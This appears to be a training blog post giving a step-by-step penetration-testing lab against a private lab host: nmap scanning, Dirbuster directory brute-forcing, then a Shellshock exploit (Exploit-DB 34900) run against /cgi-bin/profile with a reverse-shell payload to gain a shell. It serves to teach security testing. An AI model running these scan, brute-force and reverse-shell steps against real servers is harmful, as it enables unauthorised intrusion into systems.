Powered by Blogger.
Home » » Module 08: Web Application Penetration Testing Methodology 9

Module 08: Web Application Penetration Testing Methodology 9

Written By AKADEMY on Thursday, July 4, 2019 | 10:12 PM

Exercise 9: Pentesting Apache Web Server Vulnerability

Scenario

A web server is a hardware/ software application delivers web pages on request to clients using the Hypertext Transfer Protocol (HTTP). This means delivery of HTML documents and any additional content that may be included, such as video, images, style sheets, and scripts. Attackers usually target the vulnerabilities in the software to gain authorized entry to the server.
As a penetration tester, you need to know how to identify the vulnerabilities and exploit them to gain access to the server.
In this lab, you are going to learn how to:
i. Identify Apache server vulnerability
ii. Browse the vulnerable webpage
iii. Exploit the vulnerability to gain access to the server
Lab Duration25 Minutes
  1. Click Kali Linux (External Network).
    If Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  2. Type root in the Username field and click Next.
    Screenshot
  3. Type toor in the password field and click Sign In.
    Screenshot
  4. In this lab, we are going to perform pentesting on a machine with IP Address 172.19.19.19.
  5. Let us begin by performing a Nmap aggressive scan on the target machine.
    Type nmap -T4 -A 172.19.19.19 and press Enter. This will initiate the scan as shown in the screenshot below:
    Screenshot
  6. From the scan result, it is observed that there is only one open port (80) on the machine, meaning there may be a website deployed on the web server.
    Screenshot
  7. Now, launch a web browser, type http://172.19.19.19 in the address bar and press Enter.
    This displays a default webpage of Apache web server.
    Screenshot
  8. Now, we shall brute force directories and files names on web servers using Dirbuster.
    To brute force, switch to command line terminal, type dirbuster, and press Enter.
    This launches the Dirbuster application.
    Screenshot
  9. Type http://172.19.19.19 in the Target URL field and click Browse.
    Screenshot
  10. Directory listing window appears, navigate to /usr/share/dirbuster/wordlists, select directory-list-2.3-medium.txt and click Select List.
    Screenshot
  11. Once you select the list, click Start to begin the directory brute force attack.
    Screenshot
  12. Dirbuster begins to perform brute force attack on the web server and displays the results under the Scan Information tab.
    Click Results - List View tab to view the results in list format.
    Screenshot
  13. You will observe that there is a /cgi-bin/directory holding a file named profile.
    Screenshot
  14. To view the contents of the file, right-click on /cgi-bin/profile and click Open In Browser.
    Screenshot
  15. It is observed that the profile page exists in the /cgi-bin directory.
    Screenshot
  16. Based on the information obtained, we shall now search for exploits related to apache 2.2.22 and cgi-bin together.
    While looking for the suitable exploits in Google (from the local machine), the first exploit result is Exploit-db/SearchSploit ID 34900 which exploits the Shellshock vulnerability.
    Screenshot
  17. Click Stop button in the Dirbuster window to stop the directory brute force.
    Screenshot
  18. Close Dirbuster application.
    Screenshot
  19. Now, we shall copy the exploit with the Exploit-DB/SearchSploit ID 34900 to the root folder using SearchSploit.
    To copy, type searchsploit -m 34900 in the command line terminal and press Enter.
    This downloads the exploit to the root folder.
    Screenshot
  20. We shall now read the python script to view the exploit usage/PoC.
    To view, type leafpad 34900.py in the command line terminal and press Enter.
    Screenshot
  21. The python code appears in the Leafpad text editor. Observe the Example section to view the usage.
    In this lab, we will be providing the lhostrhostlportpayload and pages options to the exploit.
    Screenshot
  22. Type python 34900.py payload=reverse rhost=172.19.19.19 lhost=172.19.19.7 lport=4455 pages=/cgi-bin/profile in the command line terminal and press Enter.
    Screenshot
  23. Once you run the python script, it exploits the vulnerability and returns a shell as shown in the screenshot below, inferring that the Shellshock vulnerability has been successfully exploited.
    Screenshot
In this lab, you have learned how to:
i. Identify Apache server vulnerability
ii. Browse the vulnerable webpage
iii. Exploit the vulnerability to gain access to the server
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT